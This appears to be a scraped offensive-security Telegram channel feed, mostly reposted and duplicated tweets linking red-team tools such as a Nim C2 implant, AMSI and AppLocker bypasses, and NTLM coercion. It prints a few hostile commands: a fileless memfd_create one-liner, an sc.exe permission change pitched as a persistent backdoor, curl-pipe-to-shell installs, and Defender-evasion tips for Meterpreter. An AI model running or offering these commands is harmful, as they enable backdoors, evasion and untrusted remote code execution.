APT
🔥 NimPlant С2 This is a new light-weight, first-stage C2 implant written in Nim, with a supporting Python server and Next.JS web GUI. https://github.com/chvancooten/NimPlant #c2 #nim #python #redteam
😈 [ thehackerish, thehackerish ]
Nimplant can be customized. But be CAREFUL, @chvancooten has a good sense of humor that will get you flagged😆
Here is a full tutorial
https://t.co/Np8GJK5ugT
🔗 https://www.youtube.com/watch?v=c2_g8--GvA0&ab_channel=thehackerish
🐥 [ tweet ]
Nimplant can be customized. But be CAREFUL, @chvancooten has a good sense of humor that will get you flagged😆
Here is a full tutorial
https://t.co/Np8GJK5ugT
🔗 https://www.youtube.com/watch?v=c2_g8--GvA0&ab_channel=thehackerish
🐥 [ tweet ]
🔥1
😈 [ hetmehtaa, Het Mehta ]
Firefox Add-ons For Penetration Testers 🦊
#Infosec #Firefox #Bugbounty #TheSecureEdge
🐥 [ tweet ]
Firefox Add-ons For Penetration Testers 🦊
#Infosec #Firefox #Bugbounty #TheSecureEdge
🐥 [ tweet ]
🔥1
Offensive Xwitter
😈 [ David3141593, David Buchanan ] python memfd_create() oneliner: python3 -c "import os;os.fork()or(os.setsid(),print(f'/proc/{os.getpid()}/fd/{os.memfd_create(str())}'),os.kill(os.getpid(),19))" This prints the path of a memfd, which you can use to do…
😈 [ CraigHRowland, Craig Rowland - Agentless Linux Security ]
Nice variant of memfd_create fileless attack on Linux.
Here are some things to try to find this on a box:
Nice variant of memfd_create fileless attack on Linux.
Here are some things to try to find this on a box:
ls -alR /proc/*/fd 2> /dev/null | grep "memfd: (deleted)"
grep "memfd_create" /proc/*/cmdline
strings /proc/PID/cmdline
🐥 [ tweet ][ quote ]😈 [ ZeroMemoryEx, V2 ]
New AMSI lifetime bypass, it works by searching for the first byte of each instruction to prevent updates from affecting it, Check it out.
#amsi #redteam #cybersecurity
https://t.co/J6lBOXWFyx
🔗 https://github.com/ZeroMemoryEx/Amsi-Killer
🐥 [ tweet ]
New AMSI lifetime bypass, it works by searching for the first byte of each instruction to prevent updates from affecting it, Check it out.
#amsi #redteam #cybersecurity
https://t.co/J6lBOXWFyx
🔗 https://github.com/ZeroMemoryEx/Amsi-Killer
🐥 [ tweet ]
Offensive Xwitter
😈 [ 0gtweet, Grzegorz Tworek ] Need an almost invisible, post-exploitation, persistent, fileless, LPE backdoor? There are many, but this one looks really beautiful for me: type "sc.exe sdset scmanager D:(A;;KA;;;WD)" from an elevated command prompt. 🐥 […
😈 [ 0gtweet, Grzegorz Tworek ]
Great writeup by @0xv1n explaining how it works, and how to use it. https://t.co/B1bhaisd3m
🔗 https://0xv1n.github.io/posts/scmanager/
🐥 [ tweet ][ quote ]
Great writeup by @0xv1n explaining how it works, and how to use it. https://t.co/B1bhaisd3m
🔗 https://0xv1n.github.io/posts/scmanager/
🐥 [ tweet ][ quote ]
😈 [ 0xdeaddood, leandro ]
📝 New blog post! Let's talk about NTLM authentication coercion methods using Impacket.
Somedays ago, we updated mssqlclient[.]py with many new commands. Among them, the xp_dirtree option was added. MSSQL and xp_dirtree, you know the rest 😉.
https://t.co/hbfSi3YTRC
🔗 https://0xdeaddood.rocks/2023/02/28/relaying-everything-coercing-authentications-episode-1-mssql/
🐥 [ tweet ]
📝 New blog post! Let's talk about NTLM authentication coercion methods using Impacket.
Somedays ago, we updated mssqlclient[.]py with many new commands. Among them, the xp_dirtree option was added. MSSQL and xp_dirtree, you know the rest 😉.
https://t.co/hbfSi3YTRC
🔗 https://0xdeaddood.rocks/2023/02/28/relaying-everything-coercing-authentications-episode-1-mssql/
🐥 [ tweet ]
😈 [ pdiscoveryio, ProjectDiscovery.io ]
An in-depth guide to subfinder: Beginner to advanced 🚀
What's all this about?
✅ Installation
✅ Navigating subfinder
✅ Output options
✅ Advanced options
Let us know in the comments if we missed anything 👇
https://t.co/ZKZd33KRfH
🔗 https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/
🐥 [ tweet ]
An in-depth guide to subfinder: Beginner to advanced 🚀
What's all this about?
✅ Installation
✅ Navigating subfinder
✅ Output options
✅ Advanced options
Let us know in the comments if we missed anything 👇
https://t.co/ZKZd33KRfH
🔗 https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/
🐥 [ tweet ]
😈 [ CrowdStrike, CrowdStrike ]
🚨 The 2023 Global Threat Report is now live.
Discover the latest activities of the world’s most dangerous adversaries and CrowdStrike’s recommendations for protecting your business against modern attacks.
Access the report: https://t.co/Wa7tkn56NZ
🔗 https://crwdstr.ke/60123vKer
🐥 [ tweet ]
🚨 The 2023 Global Threat Report is now live.
Discover the latest activities of the world’s most dangerous adversaries and CrowdStrike’s recommendations for protecting your business against modern attacks.
Access the report: https://t.co/Wa7tkn56NZ
🔗 https://crwdstr.ke/60123vKer
🐥 [ tweet ]
Offensive Xwitter
😈 [ CrowdStrike, CrowdStrike ] 🚨 The 2023 Global Threat Report is now live. Discover the latest activities of the world’s most dangerous adversaries and CrowdStrike’s recommendations for protecting your business against modern attacks. Access the report:…
CrowdStrike Global Threat Report 2023.pdf
11.8 MB
🔥2
😈 [ ShitSecure, S3cur3Th1sSh1t ]
Just added an Offensive Hooking example to the OffensiveNim repo:
https://t.co/5i294uVf1b
🔗 https://github.com/byt3bl33d3r/OffensiveNim/pull/57
🐥 [ tweet ]
Just added an Offensive Hooking example to the OffensiveNim repo:
https://t.co/5i294uVf1b
🔗 https://github.com/byt3bl33d3r/OffensiveNim/pull/57
🐥 [ tweet ]
😈 [ Nettitude_Labs, Nettitude Labs ]
Introducing Aladdin, a new tool by @lefterispan for red teamers to generate payloads bypassing misconfigured WDAC and AppLocker.
https://t.co/doyRU7GYad
🔗 https://labs.nettitude.com/blog/introducing-aladdin/
🐥 [ tweet ]
Introducing Aladdin, a new tool by @lefterispan for red teamers to generate payloads bypassing misconfigured WDAC and AppLocker.
https://t.co/doyRU7GYad
🔗 https://labs.nettitude.com/blog/introducing-aladdin/
🐥 [ tweet ]
😈 [ 0x0SojalSec, Md Ismail Šojal ]
just scan for subdomain without downloding the tools:
🐥 [ tweet ]
just scan for subdomain without downloding the tools:
curl -s -L https://github.com/cihanmehmet/sub.sh/raw/master/sub.sh | bash -s webscantest.com#infosec #bugbounty #cybersec
🐥 [ tweet ]
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Installing all of our open source tools couldn't be easier than with 'pdtm' 🧰
1️⃣ Install pdtm here 👉 https://t.co/p52D5Af83i
2️⃣ Run pdtm
3️⃣ Sit back and watch all of our tools install.
4️⃣ Don't get comfy because it won't take long and there's hacking to do!
#opensource
🔗 https://github.com/projectdiscovery/pdtm
🐥 [ tweet ]
Installing all of our open source tools couldn't be easier than with 'pdtm' 🧰
1️⃣ Install pdtm here 👉 https://t.co/p52D5Af83i
2️⃣ Run pdtm
3️⃣ Sit back and watch all of our tools install.
4️⃣ Don't get comfy because it won't take long and there's hacking to do!
#opensource
🔗 https://github.com/projectdiscovery/pdtm
🐥 [ tweet ]
найс найс найс найсForwarded from Внутрянка
Небольшая теория про токены доступа в Windows
Ardent101
Неприметные токены. Часть 1. Теория
Вступление В ходе тестирования на проникновение нередко удается получить доступ с правами уровня локального администратора к какому-то сетевому объекту, функционирующему под управлением операционной системы семейства Windows.
Следующим этапом, как правило…
Следующим этапом, как правило…
Иногда бывает, что веб-версия 1С не принимает креды в basic-аутх, вследствие чего нельзя в автоматическом режиме (как, например, в 1C-Web-bruter) пробежать всех пользователей на предмет возможности логина с пустым паролем.
Вместо этого на стороне клиента генерится бинарный блоб
Копаться во всякихротебал , поэтому вот вам простой чекер на селениуме ⬇️
🔗 https://gist.github.com/snovvcrash/632ac474abf90216aecf01c212251cca
Вместо этого на стороне клиента генерится бинарный блоб
cred, который JSON-ом шлется на сервер.Копаться во всяких
mod_main_loader.js на 140к+ JS-кода, чтобы понять, как он формируется, я 🔗 https://gist.github.com/snovvcrash/632ac474abf90216aecf01c212251cca
🔥9
😈 [ s4ntiago_p, S4ntiagoP ]
I just published my implementation of call stack spoofing using hardware breakpoints 😁
Works for syscalls and APIs, supports x64, x86 and WoW64.
https://t.co/SwEl9cu1nh
🔗 https://www.coresecurity.com/blog/hardware-call-stack
🐥 [ tweet ]
I just published my implementation of call stack spoofing using hardware breakpoints 😁
Works for syscalls and APIs, supports x64, x86 and WoW64.
https://t.co/SwEl9cu1nh
🔗 https://www.coresecurity.com/blog/hardware-call-stack
🐥 [ tweet ]
🔥1
Offensive Xwitter
😈 [ pdiscoveryio, ProjectDiscovery.io ] Installing all of our open source tools couldn't be easier than with 'pdtm' 🧰 1️⃣ Install pdtm here 👉 https://t.co/p52D5Af83i 2️⃣ Run pdtm 3️⃣ Sit back and watch all of our tools install. 4️⃣ Don't get comfy because…
Мамкиного автоматизатора пост
Теперь можно ставить все тулзы от ProjectDiscovery одним щелчком легко и элегантно!
Я делаю это примерно так в WeaponizeKali.sh ⬇️
Поставить его можно так ⬇️
Теперь можно ставить все тулзы от ProjectDiscovery одним щелчком легко и элегантно!
Я делаю это примерно так в WeaponizeKali.sh ⬇️
mkdir pd && cd pd
eget -qs linux/amd64 "projectdiscovery/pdtm" --to pdtm
./pdtm -ia -ip -bp `pwd`
./nuclei
curl -sSL "https://github.com/DingyShark/nuclei-scan-sort/raw/main/nuclei_sort.py" -o nuclei_sort.py
sed -i '1 i #!/usr/bin/env python3' nuclei_sort.py
chmod +x nuclei_sort.py
Если вдруг кто-то еще не пользует eget, советую срочно начать – эта шутка позволяет забрать нужную версию релиза с GH без необходимости копипастить прямые ссылки на загрузку, самостоятельно распаковывать архивы, навешивать +x, и т. д.Поставить его можно так ⬇️
curl "https://zyedidia.github.io/eget.sh" | sh🔥9
😈 [ an0n_r0, an0n ]
Meterpreter + Metasploit is absolutely awesome. And anyway, it is not even certain that Defender will catch it: add the stageless payload using basic encoding into a template exe (thread exec), disable autoload of stdapi (you can load it later after callback), and that's all. 💥
🐥 [ tweet ][ quote ]
Meterpreter + Metasploit is absolutely awesome. And anyway, it is not even certain that Defender will catch it: add the stageless payload using basic encoding into a template exe (thread exec), disable autoload of stdapi (you can load it later after callback), and that's all. 💥
🐥 [ tweet ][ quote ]
Знаю, что даже есть люди, которые пользуются моей поделкой DivideAndScan для организации сканирования портов, поэтому запилю инфу по небольшому апдейту.
Наконец дошли руки завезти флаг
Наконец дошли руки завезти флаг
-dns для отображения хостнеймов рядом с соответствующими IP-адресами в информационном выводе. Теперь, если предварительно скормить инструменту список исследуемых доменов, БД будет обновлена полями domains, которые можно будет запросить при опросе поверхности сканирования.🔥10